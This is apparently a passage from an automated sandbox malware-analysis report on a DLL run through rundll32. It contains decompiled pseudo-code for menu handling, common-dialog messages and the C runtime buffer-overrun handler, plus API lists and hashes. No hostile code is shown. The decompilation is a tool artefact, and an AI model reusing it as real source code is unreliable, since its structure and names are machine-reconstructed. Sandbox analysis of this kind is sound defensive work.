                                                                        											_push( &_v296);
                                                                        											_push(_t136);
                                                                        											_push( &_v316);
                                                                        											_v8 = 2;
                                                                        											_t138 = E10024DC7( &_v296, __eflags);
                                                                        											_t216 =  *(_t224 + 8);
                                                                        											_t203 =  *(_t224 + 4);
                                                                        											_t77 = _t216 + 1; // 0x1
                                                                        											 *(_t224 + 8) = _t77;
                                                                        											_t79 = _t203 + 1; // 0x3
                                                                        											_t230 = _t230 + 0xc;
                                                                        											 *(_t224 + 4) = _t79;
                                                                        											_v304 =  *_t138;
                                                                        											InsertMenuA( *( *(_t224 + 0xc) + 4),  *(_t224 + 8), 0x400,  *(_t224 + 4), _v304);
                                                                        											E100014B0(_v316 + 0xfffffff0,  *(_t224 + 8));
                                                                        											_v8 = 1;
                                                                        											E100014B0(_v312 + 0xfffffff0,  *(_t224 + 8));
                                                                        											_a4 = _a4 + 1;
                                                                        											__eflags = _a4 -  *(_t220 + 4);
                                                                        											if(_a4 <  *(_t220 + 4)) {
                                                                        												_t176 = _v308;
                                                                        												continue;
                                                                        											}
                                                                        											goto L40;
                                                                        										}
                                                                        									}
                                                                        									L40:
                                                                        									 *(_t224 + 8) =  *(_t224 + 8) - 1;
                                                                        									 *((intOrPtr*)(_t224 + 0x20)) = GetMenuItemCount( *( *(_t224 + 0xc) + 4));
                                                                        									 *((intOrPtr*)(_t224 + 0x18)) = 1;
                                                                        									E100014B0(_v296 + 0xfffffff0, _t216);
                                                                        									__eflags = _v300 + 0xfffffff0;
                                                                        									_t110 = E100014B0(_v300 + 0xfffffff0, _t216);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t180 =  *_t171;
                                                                        						__eflags =  *(_t180 - 0xc);
                                                                        						if( *(_t180 - 0xc) != 0) {
                                                                        							 *((intOrPtr*)( *_t224 + 0xc))(_t180);
                                                                        						}
                                                                        						_t110 =  *((intOrPtr*)( *_t224))(0);
                                                                        					}
                                                                        					 *[fs:0x0] = _v16;
                                                                        					return E100117AE(_t110, _v20);
                                                                        				} else {
                                                                        					_push(_a4);
                                                                        					_push( &_v268);
                                                                        					if(E1002592C(__ebx, _t219, __esi) == 0) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						_t226 = 0;
                                                                        						if( *((intOrPtr*)(_t219 + 4)) - 1 > 0) {
                                                                        							while(E1002535C(_t170, _t219, _t226,  *((intOrPtr*)( *((intOrPtr*)(_t219 + 8)) + _t226 * 4)),  &_v268) == 0) {
                                                                        								_t226 = _t226 + 1;
                                                                        								if(_t226 <  *((intOrPtr*)(_t219 + 4)) - 1) {
                                                                        									continue;
                                                                        								} else {
                                                                        								}
                                                                        								L8:
                                                                        								while(_t226 > 0) {
                                                                        									E100074A5(_t170,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4, _t228,  *((intOrPtr*)(_t219 + 8)) + _t226 * 4 - 4);
                                                                        									_t226 = _t226 - 1;
                                                                        									__eflags = _t226;
                                                                        								}
                                                                        								goto L9;
                                                                        							}
                                                                        							goto L8;
                                                                        						}
                                                                        						L9:
                                                                        						return E100117AE(E10006AEC( *((intOrPtr*)(_t219 + 8)),  &_v268), _v8);
                                                                        					}
                                                                        				}
                                                                        			}















































                                                                        0x1002525e
                                                                        0x10025261
                                                                        0x10025264
                                                                        0x10025267
                                                                        0x1002526a
                                                                        0x1002526d
                                                                        0x10025270
                                                                        0x10025275
                                                                        0x1002528e
                                                                        0x1002529d
                                                                        0x100252ab
                                                                        0x100252af
                                                                        0x100252b4
                                                                        0x100252ba
                                                                        0x100252bd
                                                                        0x10025180
                                                                        0x00000000
                                                                        0x10025180
                                                                        0x00000000
                                                                        0x100252bd
                                                                        0x10025186
                                                                        0x100252c3
                                                                        0x100252c6
                                                                        0x100252db
                                                                        0x100252de
                                                                        0x100252e5
                                                                        0x100252f0
                                                                        0x100252f3
                                                                        0x100252f3
                                                                        0x10025112
                                                                        0x1002510a
                                                                        0x100250af
                                                                        0x100250af
                                                                        0x100250b1
                                                                        0x100250b4
                                                                        0x100250bb
                                                                        0x100250bb
                                                                        0x100250c4
                                                                        0x100250c4
                                                                        0x100252fd
                                                                        0x1002530e
                                                                        0x10024fea
                                                                        0x10024fea
                                                                        0x10024ff3
                                                                        0x10024ffb
                                                                        0x00000000
                                                                        0x10024ffd
                                                                        0x10025000
                                                                        0x10025005
                                                                        0x10025007
                                                                        0x10025021
                                                                        0x10025025
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10025027
                                                                        0x00000000
                                                                        0x10025039
                                                                        0x10025033
                                                                        0x10025038
                                                                        0x10025038
                                                                        0x10025038
                                                                        0x00000000
                                                                        0x10025039
                                                                        0x00000000
                                                                        0x10025007
                                                                        0x1002503d
                                                                        0x10025057
                                                                        0x10025057
                                                                        0x10024ffb

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000), ref: 10024FDD
                                                                        • __EH_prolog.LIBCMT ref: 1002506B
                                                                        • DeleteMenu.USER32(?,?,00000000), ref: 100250E9
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10025102
                                                                        • lstrlenA.KERNEL32(?), ref: 1002511F
                                                                        • wsprintfA.USER32 ref: 1002522E
                                                                          • Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
                                                                          • Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                          • Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                        • lstrcpyA.KERNEL32(?,1&0 ,000000FF,?), ref: 1002521C
                                                                        • InsertMenuA.USER32(00000002,00000000,00000400,00000002,?), ref: 1002528E
                                                                        • GetMenuItemCount.USER32 ref: 100252CC
                                                                          • Part of subcall function 1002535C: lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$H_prologlstrlen$CountCurrentDeleteDirectoryFullInsertItemNamePathlstrcmpilstrcpylstrcpynwsprintf
                                                                        • String ID: %d $&%d $1&0 $\
                                                                        • API String ID: 342826643-2399880791
                                                                        • Opcode ID: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                        • Instruction ID: 8aad9e791dd0b61d4e6d294f68b120ef5cdd25e9988c916dda0b03ab33557493
                                                                        • Opcode Fuzzy Hash: e1eed6eaa5f1d35012eb48c82aef279fa05277b41a2bb3cefb7989940d9464f9
                                                                        • Instruction Fuzzy Hash: 31B1BD34900215DFDB10CF64DC84FAAB7B4FF09345F508699E59A8B292DB31EA84CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E1001D28C(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
                                                                        				void* __ebp;
                                                                        				signed int _t31;
                                                                        				signed int _t33;
                                                                        				void* _t40;
                                                                        				int _t46;
                                                                        				intOrPtr _t64;
                                                                        				signed int* _t65;
                                                                        				void* _t67;
                                                                        				intOrPtr* _t69;
                                                                        
                                                                        				if(_a4 != 0) {
                                                                        					_push(0x100347fd);
                                                                        					_t53 = 0x1004efe8;
                                                                        					_t67 = E10037855(0x1004efe8);
                                                                        					__eflags =  *(_t67 + 0x18);
                                                                        					if( *(_t67 + 0x18) != 0) {
                                                                        						_push(_a4);
                                                                        						__eflags = E10022115();
                                                                        						if(__eflags == 0) {
                                                                        							_t53 =  *(_t67 + 0x18);
                                                                        							E10022DAA( *(_t67 + 0x18), __eflags, _a4);
                                                                        							 *(_t67 + 0x18) = 0;
                                                                        						}
                                                                        					}
                                                                        					_t64 = _a8;
                                                                        					__eflags = _t64 - 0x110;
                                                                        					if(_t64 != 0x110) {
                                                                        						__eflags = _t64 -  *0x1004f3b8; // 0x0
                                                                        						if(__eflags == 0) {
                                                                        							L22:
                                                                        							SendMessageA(_a4, 0x111, 0xe146, 0);
                                                                        							_t31 = 1;
                                                                        							__eflags = 1;
                                                                        							goto L23;
                                                                        						}
                                                                        						__eflags = _t64 - 0x111;
                                                                        						if(_t64 != 0x111) {
                                                                        							L10:
                                                                        							__eflags = _t64 - 0xc000;
                                                                        							if(_t64 >= 0xc000) {
                                                                        								_push(_a4);
                                                                        								_t69 = E10022115();
                                                                        								_t33 = E100244DE(_t69, 0x10040f58);
                                                                        								__eflags = _t33;
                                                                        								if(_t33 == 0) {
                                                                        									L14:
                                                                        									__eflags = _t64 -  *0x1004f3ac; // 0x0
                                                                        									if(__eflags != 0) {
                                                                        										__eflags = _t64 -  *0x1004f3b0; // 0x0
                                                                        										if(__eflags != 0) {
                                                                        											__eflags = _t64 -  *0x1004f3a8; // 0x0
                                                                        											if(__eflags != 0) {
                                                                        												__eflags = _t64 -  *0x1004f3b4; // 0x0
                                                                        												if(__eflags != 0) {
                                                                        													goto L11;
                                                                        												}
                                                                        												_t31 =  *((intOrPtr*)( *_t69 + 0x158))();
                                                                        												goto L23;
                                                                        											}
                                                                        											 *((intOrPtr*)( *_t69 + 0x160))(_a12, _a16 & 0x0000ffff, _a16 >> 0x10);
                                                                        											goto L11;
                                                                        										}
                                                                        										_t19 = _t69 + 0x1c0; // 0x1c0
                                                                        										_t65 = _t19;
                                                                        										 *_t65 = _a16;
                                                                        										_t31 =  *((intOrPtr*)( *_t69 + 0x15c))();
                                                                        										 *_t65 =  *_t65 & 0x00000000;
                                                                        										goto L23;
                                                                        									}
                                                                        									_t31 =  *((intOrPtr*)( *_t69 + 0x158))(_a16);
                                                                        									goto L23;
                                                                        								}
                                                                        								_t40 = E1001CE89(_t69);
                                                                        								__eflags =  *(_t40 + 0x36) & 0x00000008;
                                                                        								if(( *(_t40 + 0x36) & 0x00000008) != 0) {
                                                                        									goto L11;
                                                                        								}
                                                                        								goto L14;
                                                                        							}
                                                                        							L11:
                                                                        							_t31 = 0;
                                                                        							goto L23;
                                                                        						}
                                                                        						__eflags = _a12 - 0x40e;
                                                                        						if(_a12 == 0x40e) {
                                                                        							goto L22;
                                                                        						}
                                                                        						goto L10;
                                                                        					} else {
                                                                        						 *0x1004f3a8 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
                                                                        						 *0x1004f3ac = RegisterClipboardFormatA("commdlg_ShareViolation");
                                                                        						 *0x1004f3b0 = RegisterClipboardFormatA("commdlg_FileNameOK");
                                                                        						 *0x1004f3b4 = RegisterClipboardFormatA("commdlg_ColorOK");
                                                                        						 *0x1004f3b8 = RegisterClipboardFormatA("commdlg_help");
                                                                        						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
                                                                        						_push(_a16);
                                                                        						 *0x1004f3bc = _t46;
                                                                        						_push(_a12);
                                                                        						_t31 = E1001EB68(_t53, _a4, 0x110);
                                                                        						L23:
                                                                        						return _t31;
                                                                        					}
                                                                        				}
                                                                        				return 0;
                                                                        			}













                                                                        APIs
                                                                        • RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 1001D2E7
                                                                        • RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 1001D2F3
                                                                        • RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 1001D2FF
                                                                        • RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 1001D30B
                                                                        • RegisterClipboardFormatA.USER32(commdlg_help), ref: 1001D317
                                                                        • RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1001D323
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ClipboardFormatRegister
                                                                        • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                        • API String ID: 1228543026-3888057576
                                                                        • Opcode ID: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                        • Instruction ID: 90b801e29acbd5a70dd584596d4e007027562c874008bfc0544b1ea411f40a0f
                                                                        • Opcode Fuzzy Hash: 26a9f27f9cc4385a7a007a1bb79a9b34ea0bc551609e4be67ab91c335422c716
                                                                        • Instruction Fuzzy Hash: E7418071A00265EFDB21FF25CC889AE3BE1EB44391B12442AF905DB251DB30EA91CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E10016BAA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _t32;
                                                                        				intOrPtr* _t33;
                                                                        				void* _t41;
                                                                        				signed int _t54;
                                                                        				unsigned int _t59;
                                                                        				void* _t75;
                                                                        				intOrPtr* _t76;
                                                                        				signed int _t81;
                                                                        				char* _t83;
                                                                        				void* _t86;
                                                                        				intOrPtr _t87;
                                                                        				void* _t88;
                                                                        				intOrPtr _t89;
                                                                        
                                                                        				_push(0x118);
                                                                        				_push(0x10042558);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t32 =  *0x1004c470; // 0x1bfbe703
                                                                        				 *((intOrPtr*)(_t88 - 0x1c)) = _t32;
                                                                        				_t33 =  *0x1004f708; // 0x0
                                                                        				if(_t33 == 0) {
                                                                        					if( *((intOrPtr*)(_t88 + 8)) == 1) {
                                                                        						_t83 = "Buffer overrun detected!";
                                                                        						 *(_t88 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
                                                                        						_t86 = 0xb9;
                                                                        					} else {
                                                                        						_t83 = "Unknown security failure detected!";
                                                                        						 *(_t88 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
                                                                        						_t86 = 0xd4;
                                                                        					}
                                                                        					 *((char*)(_t88 - 0x20)) = 0;
                                                                        					if(GetModuleFileNameA(0, _t88 - 0x124, 0x104) == 0) {
                                                                        						E10017B90(_t88 - 0x124, "<program name unknown>");
                                                                        					}
                                                                        					_t71 = _t88 - 0x124;
                                                                        					if(E10011820(_t88 - 0x124) + 0xb > 0x3c) {
                                                                        						E10019E20(E10011820(_t71) + _t88 - 0xf3, "...", 3);
                                                                        						_t89 = _t89 + 0x10;
                                                                        					}
                                                                        					_t41 = E10011820(_t71);
                                                                        					_pop(_t75);
                                                                        					E10010B20(_t41 + _t86 + 0x0000000c + 0x00000003 & 0xfffffffc, _t75);
                                                                        					 *((intOrPtr*)(_t88 - 0x18)) = _t89;
                                                                        					_t87 = _t89;
                                                                        					E10017B90(_t87, _t83);
                                                                        					E10017BA0(_t87, "\n\n");
                                                                        					E10017BA0(_t87, "Program: ");
                                                                        					E10017BA0(_t87, _t71);
                                                                        					E10017BA0(_t87, "\n\n");
                                                                        					E10017BA0(_t87,  *(_t88 - 0x128));
                                                                        					_push(0x12010);
                                                                        					_push("Microsoft Visual C++ Runtime Library");
                                                                        					_push(_t87);
                                                                        					E10019D1D();
                                                                        					_t89 = _t89 + 0x3c;
                                                                        				} else {
                                                                        					 *(_t88 - 4) = 0;
                                                                        					 *_t33( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 + 0xc)));
                                                                        					 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
                                                                        				}
                                                                        				E10011F56(3);
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				asm("int3");
                                                                        				_t81 =  *(_t89 + 4);
                                                                        				_t76 =  *((intOrPtr*)(_t89 + 8));
                                                                        				if((_t81 & 0x00000003) != 0) {
                                                                        					if((_t81 & 0x00000001) == 0) {
                                                                        						L28:
                                                                        						_t54 =  *_t81;
                                                                        						_t81 = _t81 + 2;
                                                                        						if(_t54 !=  *_t76) {
                                                                        							goto L23;
                                                                        						} else {
                                                                        							_t54 = _t54;
                                                                        							if(_t54 == 0) {
                                                                        								goto L22;
                                                                        							} else {
                                                                        								if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
                                                                        									goto L23;
                                                                        								} else {
                                                                        									if(_t54 == 0) {
                                                                        										goto L22;
                                                                        									} else {
                                                                        										_t76 = _t76 + 2;
                                                                        										goto L13;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t54 =  *_t81;
                                                                        						_t81 = _t81 + 1;
                                                                        						if(_t54 !=  *_t76) {
                                                                        							goto L23;
                                                                        						} else {
                                                                        							_t76 = _t76 + 1;
                                                                        							if(_t54 == 0) {
                                                                        								goto L22;
                                                                        							} else {
                                                                        								if((_t81 & 0x00000002) == 0) {
                                                                        									goto L13;
                                                                        								} else {
                                                                        									goto L28;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					while(1) {
                                                                        						L13:
                                                                        						_t54 =  *_t81;
                                                                        						if(_t54 !=  *_t76) {
                                                                        							break;
                                                                        						}
                                                                        						_t54 = _t54;
                                                                        						if(_t54 == 0) {
                                                                        							L22:
                                                                        							return 0;
                                                                        						} else {
                                                                        							if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
                                                                        								break;
                                                                        							} else {
                                                                        								_t59 = _t54;
                                                                        								if(_t59 == 0) {
                                                                        									goto L22;
                                                                        								} else {
                                                                        									_t54 = _t59 >> 0x10;
                                                                        									if(_t54 !=  *((intOrPtr*)(_t76 + 2))) {
                                                                        										break;
                                                                        									} else {
                                                                        										_t54 = _t54;
                                                                        										if(_t54 == 0) {
                                                                        											goto L22;
                                                                        										} else {
                                                                        											if(_t54 !=  *((intOrPtr*)(_t76 + 3))) {
                                                                        												break;
                                                                        											} else {
                                                                        												_t76 = _t76 + 4;
                                                                        												_t81 = _t81 + 4;
                                                                        												if(_t54 != 0) {
                                                                        													continue;
                                                                        												} else {
                                                                        													goto L22;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L33;
                                                                        					}
                                                                        					L23:
                                                                        					asm("sbb eax, eax");
                                                                        					return (_t54 << 1) + 1;
                                                                        				}
                                                                        				L33:
                                                                        			}

















                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,10042558,00000118,10011796,00000001,00000000,10041D50,00000008,10016B00,00000000,00000000,00000000), ref: 10016C2B
                                                                        • _strcat.LIBCMT ref: 10016C41
                                                                        • _strlen.LIBCMT ref: 10016C51
                                                                        • _strlen.LIBCMT ref: 10016C62
                                                                        • _strncpy.LIBCMT ref: 10016C7C
                                                                        • _strlen.LIBCMT ref: 10016C85
                                                                        • _strcat.LIBCMT ref: 10016CA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen$_strcat$FileModuleName_strncpy
                                                                        • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                        • API String ID: 3058806289-1673886896
                                                                        • Opcode ID: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                        • Instruction ID: 88295e5d41c60b50e9a3e58cda1e4c53c685b81e948abb858cf034152a287b35
                                                                        • Opcode Fuzzy Hash: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                        • Instruction Fuzzy Hash: 6731B476A052146BDB15DB60CC82FDE36B8EF05214F600169F514EF142DB38EBD18BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E1000FCF8(signed int __ecx) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t112;
                                                                        				signed int _t115;
                                                                        				signed int _t118;
                                                                        				signed char _t119;
                                                                        				signed int _t122;
                                                                        				signed int _t123;
                                                                        				signed int _t127;
                                                                        				void* _t132;
                                                                        				signed char _t136;
                                                                        				signed int _t137;
                                                                        				signed int _t138;
                                                                        				signed int _t139;
                                                                        				signed char _t147;
                                                                        				intOrPtr _t148;
                                                                        				signed int _t149;
                                                                        				short _t153;
                                                                        				signed int _t154;
                                                                        				signed int _t155;
                                                                        				signed int _t156;
                                                                        				signed int _t160;
                                                                        				signed int _t163;
                                                                        				signed char _t164;
                                                                        				signed int _t165;
                                                                        				signed int _t166;
                                                                        				short _t169;
                                                                        				WPARAM _t171;
                                                                        				signed int _t172;
                                                                        				signed int* _t173;
                                                                        				void* _t174;
                                                                        				void* _t188;
                                                                        				struct tagMSG* _t192;
                                                                        				signed int _t193;
                                                                        				signed int _t195;
                                                                        				int _t197;
                                                                        				signed int _t198;
                                                                        				int _t201;
                                                                        				signed int _t202;
                                                                        				signed int _t206;
                                                                        				signed int _t207;
                                                                        				signed int _t208;
                                                                        				signed int _t209;
                                                                        				void* _t210;
                                                                        				void* _t212;
                                                                        
                                                                        				_t185 = __ecx;
                                                                        				E10011BF0(0x1003b09e, _t210);
                                                                        				_t112 =  *(_t210 + 8);
                                                                        				 *((intOrPtr*)(_t210 - 0x10)) = _t212 - 0x20;
                                                                        				if(_t112 != 0) {
                                                                        					 *(_t210 - 0x28) =  *(_t112 + 0x1c);
                                                                        				} else {
                                                                        					 *(_t210 - 0x28) =  *(_t210 - 0x28) & _t112;
                                                                        				}
                                                                        				_t192 =  *(_t210 + 0xc);
                                                                        				_t201 = _t192->message;
                                                                        				 *(_t210 - 0x18) = _t201;
                                                                        				 *(_t210 - 0x2c) = GetFocus();
                                                                        				_t115 = E100220EE(_t210, _t114);
                                                                        				_t180 = 0x100;
                                                                        				 *(_t210 - 0x14) = _t115;
                                                                        				if(_t201 < 0x100 || _t201 > 0x109) {
                                                                        					if(_t201 < 0x200 || _t201 > 0x209) {
                                                                        						goto L27;
                                                                        					} else {
                                                                        						goto L7;
                                                                        					}
                                                                        				} else {
                                                                        					L7:
                                                                        					if(_t115 == 0) {
                                                                        						L27:
                                                                        						 *((intOrPtr*)(_t210 - 0x1c)) = E100220EE(_t210, _t192->hwnd);
                                                                        						_t202 = 0;
                                                                        						 *(_t210 - 0x24) =  *(_t210 - 0x24) & 0;
                                                                        						_t118 =  *(_t210 - 0x18) - _t180;
                                                                        						__eflags = _t118;
                                                                        						 *((intOrPtr*)(_t210 - 0x20)) = 2;
                                                                        						if(_t118 == 0) {
                                                                        							_t119 = E1000F57E( *((intOrPtr*)(_t210 - 0x1c)), _t192);
                                                                        							_t185 = _t192->wParam & 0x0000ffff;
                                                                        							__eflags = _t185 - 0x1b;
                                                                        							if(__eflags > 0) {
                                                                        								__eflags = _t185 - 0x25;
                                                                        								if(_t185 < 0x25) {
                                                                        									L47:
                                                                        									_t193 = IsDialogMessageA( *( *(_t210 + 8) + 0x1c),  *(_t210 + 0xc));
                                                                        									__eflags = _t193;
                                                                        									if(_t193 != 0) {
                                                                        										_t132 = E100220EE(_t210, GetFocus());
                                                                        										__eflags = _t132 -  *(_t210 - 0x14);
                                                                        										if(_t132 !=  *(_t210 - 0x14)) {
                                                                        											E1000F9FD(_t180, _t185, _t193, GetFocus, E100220EE(_t210, GetFocus()));
                                                                        											_pop(_t185);
                                                                        										}
                                                                        									}
                                                                        									L50:
                                                                        									_t122 = IsWindow( *(_t210 - 0x2c));
                                                                        									__eflags = _t122;
                                                                        									if(_t122 != 0) {
                                                                        										E1000FA6A(_t185, _t210,  *(_t210 - 0x14), E100220EE(_t210, GetFocus()));
                                                                        										_pop(_t188);
                                                                        										_t127 = IsWindow( *(_t210 - 0x28));
                                                                        										__eflags = _t127;
                                                                        										if(_t127 != 0) {
                                                                        											E1000FC18(_t188,  *(_t210 + 8),  *(_t210 - 0x14), E100220EE(_t210, GetFocus()));
                                                                        										}
                                                                        									}
                                                                        									_t123 = _t193;
                                                                        									goto L54;
                                                                        								}
                                                                        								__eflags = _t185 - 0x26;
                                                                        								if(_t185 <= 0x26) {
                                                                        									 *(_t210 - 0x24) = 1;
                                                                        									L81:
                                                                        									_t136 = E1000F57E( *(_t210 - 0x14), _t192);
                                                                        									__eflags = _t136 & 0x00000001;
                                                                        									if((_t136 & 0x00000001) != 0) {
                                                                        										goto L47;
                                                                        									}
                                                                        									__eflags =  *(_t210 - 0x24);
                                                                        									_t185 =  *(_t210 + 8);
                                                                        									_push(0);
                                                                        									if( *(_t210 - 0x24) == 0) {
                                                                        										_t137 = E10020753(_t185);
                                                                        									} else {
                                                                        										_t137 = E10020657(_t185);
                                                                        									}
                                                                        									_t206 = _t137;
                                                                        									__eflags = _t206;
                                                                        									if(_t206 == 0) {
                                                                        										goto L47;
                                                                        									} else {
                                                                        										__eflags =  *(_t206 + 8);
                                                                        										if( *(_t206 + 8) != 0) {
                                                                        											_t185 =  *(_t210 + 8);
                                                                        											E1002084F( *(_t210 + 8), _t206);
                                                                        										}
                                                                        										__eflags =  *(_t206 + 4);
                                                                        										if( *(_t206 + 4) == 0) {
                                                                        											_t138 =  *_t206;
                                                                        											__eflags = _t138;
                                                                        											if(_t138 == 0) {
                                                                        												_t185 =  *(_t210 + 8);
                                                                        												_t139 = E1000F62D( *(_t210 + 8),  *(_t210 - 0x14),  *(_t210 - 0x24));
                                                                        											} else {
                                                                        												_t139 = E100220EE(_t210, _t138);
                                                                        											}
                                                                        											_t195 = _t139;
                                                                        											__eflags = _t195;
                                                                        											if(_t195 == 0) {
                                                                        												goto L47;
                                                                        											} else {
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *(_t210 + 8) + 0x48)) + 0x6c)) = 0;
                                                                        												E1000F667(_t195);
                                                                        												__eflags =  *(_t206 + 8);
                                                                        												if( *(_t206 + 8) != 0) {
                                                                        													SendMessageA( *(_t195 + 0x1c), 0xf1, 1, 0);
                                                                        												}
                                                                        												goto L90;
                                                                        											}
                                                                        										} else {
                                                                        											_t185 =  *(_t206 + 4);
                                                                        											 *((intOrPtr*)( *( *(_t206 + 4)) + 0xac))(_t192);
                                                                        											L90:
                                                                        											_t193 = 1;
                                                                        											goto L50;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t185 - 0x28;
                                                                        								if(_t185 <= 0x28) {
                                                                        									goto L81;
                                                                        								}
                                                                        								__eflags = _t185 - 0x2b;
                                                                        								if(_t185 != 0x2b) {
                                                                        									goto L47;
                                                                        								}
                                                                        								L68:
                                                                        								__eflags = _t119 & 0x00000004;
                                                                        								if((_t119 & 0x00000004) != 0) {
                                                                        									goto L47;
                                                                        								}
                                                                        								_t147 = E1000F60C( *(_t210 - 0x14));
                                                                        								__eflags = _t147 & 0x00000010;
                                                                        								_pop(_t185);
                                                                        								if((_t147 & 0x00000010) == 0) {
                                                                        									_t148 = E1000FBEB( *(_t210 + 8));
                                                                        								} else {
                                                                        									_t202 =  *(_t210 - 0x14);
                                                                        									_t185 = _t202;
                                                                        									_t148 = E10020354(_t202);
                                                                        								}
                                                                        								_t197 = 0;
                                                                        								__eflags = _t202;
                                                                        								 *((intOrPtr*)(_t210 - 0x20)) = _t148;
                                                                        								if(_t202 != 0) {
                                                                        									L76:
                                                                        									_t185 = _t202;
                                                                        									_t149 = E100203CE(_t202);
                                                                        									__eflags = _t149;
                                                                        									if(_t149 != 0) {
                                                                        										__eflags =  *((intOrPtr*)(_t202 + 0x4c)) - _t197;
